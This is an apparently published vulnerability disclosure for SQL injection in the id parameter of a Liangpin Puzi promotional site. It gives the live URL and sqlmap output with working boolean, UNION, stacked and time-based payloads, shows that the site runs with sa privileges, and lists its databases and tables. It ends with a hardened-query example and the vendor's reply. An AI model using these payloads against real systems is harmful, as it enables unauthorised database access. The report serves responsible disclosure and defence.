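2014-12-30: Details sent to the vendor; awaiting vendor handling
2015-01-03: Vendor confirmed; details disclosed to the vendor only
2015-01-13: Details disclosed to core white hats and experts in related fields
2015-01-23: Details disclosed to regular white hats
2015-02-02: Details disclosed to trainee white hats
2015-02-13: Details disclosed to the public

良品铺子 (Liangpin Puzi): high-risk SQL injection in one of its systems (SA privileges)

Link: http://www.517lppz.cn/map.aspx?id=1
The id parameter is not filtered.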
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 5836=5836

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: id=-5132 UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113)+CHAR(107)+CHAR(120)+CHAR(106)+CHAR(113)+CHAR(65)+CHAR(98)+CHAR(106)+CHAR(115)+CHAR(80)+CHAR(109)+CHAR(72)+CHAR(107)+CHAR(81)+CHAR(119)+CHAR(113)+CHAR(120)+CHAR(118)+CHAR(98)+CHAR(113),NULL,NULL--

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: id=1; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: id=1 WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
database management system users privileges:
[*] sa (administrator)
[*] whlppz

available databases [5]:
[*] master
[*] model
[*] msdb
[*] tempdb
[*] whlppz
Database: whlppz
[45 tables]
+--------------------+
| AboutInfo          |
| BookInfo           |
| CityInfo           |
| ContactInfo        |
| CountyInfo         |
| D99_REG            |
| D99_Tmp            |
| DeliveryAddress    |
| ExchangeEcordsInfo |
| GoodsInfo          |
| GoodsType          |
| IdPptInfo          |
| IndexPPTInfo       |
| IntegralRule       |
| LinkInfo           |
| LocationInfo       |
| LocationPhoto      |
| LocationType       |
| LoveInfo           |
| LovePhoto          |
| NewsInfo           |
| NewsType           |
| NoticeInfo         |
| NoticeType         |
| NtPptInfo          |
| OrderInfo          |
| PPTInfo            |
| PageSizeInfo       |
| Price              |
| PriceType          |
| ProvinceInfo       |
| ScoreAddRecord     |
| ScoreAddType       |
| UserInfo           |
| VipInfo            |
| WebKeyWord         |
| WebSiteInfo        |
| caseInfo           |
| casePhoto          |
| caseType           |
| dianMianInfo       |
| guangGao           |
| loveType           |
| yinHua             |
| zhaoPingInfo       |
+--------------------+
I did not go any further.

Filter the input.
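
The boolean-based probe from the sqlmap output, run against a concatenated query and against a validated, parameter-bound one. This is an added example, not code from the site or from the report: the `locations` table, its rows and all function names are constructed, and in-memory SQLite stands in for SQL Server.

```python
import sqlite3


def make_db():
    # Constructed sample data; SQLite is a stand-in for the SQL Server back end.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE locations (id INTEGER PRIMARY KEY, name TEXT)")
    db.executemany("INSERT INTO locations VALUES (?, ?)",
                   [(1, "store-a"), (2, "store-b")])
    return db


def lookup_vulnerable(db, raw_id):
    # 'Before': the id value is concatenated into the statement,
    # so any SQL appended to it becomes part of the query.
    sql = "SELECT name FROM locations WHERE id = " + raw_id
    return db.execute(sql).fetchall()


def lookup_hardened(db, raw_id):
    # 'After': accept only a short run of ASCII digits, then bind the
    # integer as a parameter so it can never be parsed as SQL.
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 9):
        raise ValueError("id must be a non-negative integer")
    sql = "SELECT name FROM locations WHERE id = ?"
    return db.execute(sql, (int(raw_id),)).fetchall()


def differential(db, lookup):
    # The boolean-based check from the sqlmap output: the same id with a
    # true condition and with a false condition appended.
    results = []
    for probe in ("1 AND 5836=5836", "1 AND 5836=5837"):
        try:
            results.append(lookup(db, probe))
        except ValueError:
            results.append("rejected")
    return results


if __name__ == "__main__":
    print("vulnerable:", differential(make_db(), lookup_vulnerable))
    print("hardened:  ", differential(make_db(), lookup_hardened))
    print("normal id: ", lookup_hardened(make_db(), "2"))
```

The differing results for the true and the false condition are what mark the parameter as injectable. Parameter binding closes the injection itself; the sa login shown in the sqlmap output is a separate issue that a least-privilege database account addresses.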
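
Severity: Low
Vulnerability Rank: 5
Confirmed: 2015-01-03 15:52

This is the company's promotional website, not the online store's business site, and it currently holds no important user data. Still, thanks to the reporter for the submission. We will handle it as soon as possible. Thank you.

None yet.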